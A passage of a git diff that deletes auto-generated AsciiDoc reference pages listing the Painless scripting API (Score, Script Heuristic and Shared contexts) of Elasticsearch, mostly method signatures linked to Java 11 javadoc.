{java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-score/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-score/index.asciidoc deleted file mode 100644 index 7a6bad51e11..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-score/index.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-score]] -=== Score API - -The following specialized API is available in the Score context. - -* See the <> for further API available in all contexts. - -==== Static Methods -The following methods are directly callable without a class/instance qualifier. Note parameters denoted by a (*) are treated as read-only values. - -* double cosineSimilarity(List *, Object *) -* double cosineSimilaritySparse(Map *, Object *) -* double decayDateExp(String *, String *, String *, double *, JodaCompatibleZonedDateTime) -* double decayDateGauss(String *, String *, String *, double *, JodaCompatibleZonedDateTime) -* double decayDateLinear(String *, String *, String *, double *, JodaCompatibleZonedDateTime) -* double decayGeoExp(String *, String *, String *, double *, GeoPoint) -* double decayGeoGauss(String *, String *, String *, double *, GeoPoint) -* double decayGeoLinear(String *, String *, String *, double *, GeoPoint) -* double decayNumericExp(double *, double *, double *, double *, double) -* double decayNumericGauss(double *, double *, double *, double *, double) -* double decayNumericLinear(double *, double *, double *, double *, double) -* double dotProduct(List *, Object *) -* double dotProductSparse(Map *, Object *) -* double l1norm(List *, Object *) -* double l1normSparse(Map *, Object *) -* double l2norm(List *, Object *) -* double l2normSparse(Map *, Object *) -* double randomScore(int *) -* double randomScore(int *, String *) -* double saturation(double, double) -* double sigmoid(double, double, double) - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.vectors.query -<> - -* <> -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-score/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-score/packages.asciidoc deleted file mode 100644 index 5be078469d6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-score/packages.asciidoc +++ /dev/null @@ -1,234 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-score-java-lang"] -=== Score API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-score-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-score-org-elasticsearch-xpack-vectors-query"] -=== Score API for package org.elasticsearch.xpack.vectors.query -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-score-VectorScriptDocValues]] -==== VectorScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(String) -* Object getByPath(String, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* String join(String) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-score-VectorScriptDocValues-DenseVectorScriptDocValues]] -==== VectorScriptDocValues.DenseVectorScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(String) -* Object getByPath(String, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* String join(String) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-score-VectorScriptDocValues-SparseVectorScriptDocValues]] -==== VectorScriptDocValues.SparseVectorScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(String) -* Object getByPath(String, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* String join(String) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/index.asciidoc deleted file mode 100644 index 8b32ad624a3..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-script-heuristic]] -=== Script Heuristic API - -The following specialized API is available in the Script Heuristic context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/packages.asciidoc deleted file mode 100644 index e5799e8fdd4..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-script-heuristic/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-script-heuristic-java-lang"] -=== Script Heuristic API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-script-heuristic-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-shared/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-shared/index.asciidoc deleted file mode 100644 index c8bbedadf6b..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-shared/index.asciidoc +++ /dev/null @@ -1,435 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-shared]] -=== Shared API - -The following API is available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.math -<> - -* <> -* <> -* <> -* <> - -==== java.text -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.chrono -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.format -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.temporal -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.time.zone -<> - -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.util -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.util.function -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== java.util.regex -<> - -* <> -* <> - -==== java.util.stream -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== org.apache.lucene.util -<> - -* <> - -==== org.elasticsearch.common.geo -<> - -* <> - -==== org.elasticsearch.index.fielddata -<> - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -==== org.elasticsearch.index.mapper -<> - -* <> - -==== org.elasticsearch.index.query -<> - -* <> - -==== org.elasticsearch.index.similarity -<> - -* <> -* <> -* <> -* <> - -==== org.elasticsearch.painless.api -<> - -* <> - -==== org.elasticsearch.script -<> - -* <> - -==== org.elasticsearch.search.lookup -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-shared/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-shared/packages.asciidoc deleted file mode 100644 index 584d7ade9ec..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-shared/packages.asciidoc +++ /dev/null @@ -1,8616 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-shared-java-lang"] -=== Shared API for package java.lang -See the <> for a high-level overview of all packages and classes. - 